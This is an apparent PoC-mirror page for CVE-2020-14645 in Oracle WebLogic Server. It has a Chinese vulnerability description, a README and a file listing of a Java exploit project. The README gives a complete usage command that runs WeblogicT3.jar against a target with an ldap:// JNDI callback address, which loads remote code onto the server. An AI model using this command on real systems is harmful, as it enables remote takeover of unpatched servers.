Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-14645 PoC — Oracle Fusion Middleware WebLogic Server Core组件安全漏洞

Source
https://github.com/DaBoQuan/CVE-2020-14645
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server Core组件安全漏洞 (CVE-2020-14645)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server的Core组件存在安全漏洞。攻击者可利用该漏洞控制Oracle WebLogic Server,影响数据的可用性、保密性和完整性。以下产品及版本受到影响:Oracl
Readme
# CVE-2020-14645

## 使用方法

首先使用[NDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md)监听,并生成一个ldap地址。


`java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]`

-Tatget 和-RMI必填,https可使用--SSL参数,-Port默认7001。

自行编译需要添加coherence.jar和wlfullclient.jar
### 漏洞参考:
https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484377&idx=1&sn=01d62d175127099275a243ab5fe02bc3&chksm=f9ee6f66ce99e670dbb6da2a3648ea5f6a91fa503441dccd903f44e76883019890d8a9701a29&scene=158#rd
### 代码参考:
https://github.com/Y4er/CVE-2020-2883
File Snapshot

 [4.0K]  /data/pocs/d21a2a036e672defe6e7d36846a475483ffc7bfc
├── [ 695]  README.md
└── [4.0K]  src
    ├── [4.0K]  META-INF
    │   └── [  52]  MANIFEST.MF
    ├── [4.0K]  pub
    │   └── [4.0K]  fuzz
    │       ├── [3.9K]  main.java
    │       ├── [4.0K]  t3
    │       │   └── [4.5K]  T3ProtocolOperation.java
    │       └── [4.0K]  utils
    │           ├── [1.9K]  BytesOperation.java
    │           ├── [1.1K]  Reflections.java
    │           ├── [ 982]  Serializables.java
    │           └── [ 227]  SocketFactory.java
    └── [1.7K]  test.java

6 directories, 9 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.